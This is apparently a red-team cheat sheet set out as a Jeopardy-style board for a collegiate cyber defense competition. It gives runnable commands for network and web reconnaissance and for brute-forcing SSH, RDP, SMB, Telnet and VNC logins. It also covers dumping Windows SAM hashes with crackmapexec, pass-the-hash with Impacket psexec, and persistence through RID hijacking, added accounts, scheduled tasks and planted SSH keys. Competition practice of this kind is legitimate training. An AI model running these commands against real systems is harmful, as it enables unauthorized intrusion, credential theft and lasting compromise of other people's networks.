Windows
WebApp
Linux
FTP
SMB
100

RECON for AD and other VULNS

(optional) UDP scan: nmap -sU -F -Pn -v -d -sC -sV --open --reason -T5 <targets>

(Domain controller, SMB services, HTTP, Exchange) nmap -T4 -p21,22,23,25,53,80,137,139,443,445 <TARGET/24> -oA rec

cat rec.nmap | grep "open"

crackmapexec smb 192.168.223.13 -u Administrator -p ~/Desktop/Initial/2_Pass_PRCCDC2019

100

RECON Web

perl nikto.pl -h [path-to-greppable-nmap-file] -p 80,280,443,591,593,981,1311,2031,2480,3181,4444,4445,4567,4711,4712,5104,5280,5800,5988,5989,7000,7001,7002,8008,8011,8012,8013,8014,8042,8069,8080,8081,8243,8280,8281,8531,8887,8888,9080,9443,11371,12443,16080,18091,18092

nmap -sS -A -T4 --open --reason -oA target_system --webxml -p- <YOUR_IP_of_TargetHERE>

kali@root:~# git clone https://github.com/wpscanteam/wpscan

kali@root:~# wpscan --url <your_WP_Website_IPHERE>

100

Linux RECON

nmap -sC -sV -p22 <target>

Get em all

nmap -sV --open -T4 -v7 -p80,280,443,591,593,981,1311,2031,2480,3181,4444,4445,4567,4711,4712,5104,5280,5800,5988,5989,7000,7001,7002,8008,8011,8012,8013,8014,8042,8069,8080,8081,8243,8280,8281,8531,8887,8888,9080,9443,11371,12443,16080,18091,18092 -iL live-hosts.txt -oA web

100

RECON for FTP

nmap -sC -sV -p21 <target>

100

RECON for SMB

nmap --script=smb-enum-shares -p445 <target>

200

INITIAL ACCESS

VNC:

nmap --script=vnc-brute -p5800,5900

SMB Brute: 

medusa -h <host.ip> -u <account.name> -P /path/to/wordlist -M smbnt

RDP Brute Force:

ncrack -u administrator -P 500-worst-passwords.txt -p 3389 10.212.50.21

Telnet BruteForce:

medusa -h <tehost.ip> -u <account.name> -P /path/to/wordlist -M telnet

medusa -M telnet -C /usr/share/wordlists/telnet.lst -H 23.txt -T 10 -t 3 | grep SUCCESS | tee medusa-results.txt

200

INITIAL ACCESS

SSH BruteForce:

medusa -M ssh -C /usr/share/wordlists/ssh.lst -H 22.txt -T 10 | grep SUCCESS | tee medusa-results.txt

VNC

nmap --script=vnc-brute -p5800,5900

300

Lateral Move

crackmapexec smb 192.168.223.13 -u Administrator -p ~/Desktop/Initial/2_Pass_PRCCDC2023 

Grab admin hash:

crackmapexec smb 192.168.223.13 -u administrator -p 'P@$$word1' -d pets.local --sam 

Use Impacket to psexec to another box with hash:

python psexec.py -hashes :<PUT-YOUR-HASH-HERE> administrator@<TARGET> 

400

PERSISTENCE (staying on the system)

Guest account to Admin:

use post/windows/manage/rid_hijack 

Add schtasks

Add user account

400

PERSISTENCE (Stay on the box)

Add your public keys to ~/.ssh/authorized_keys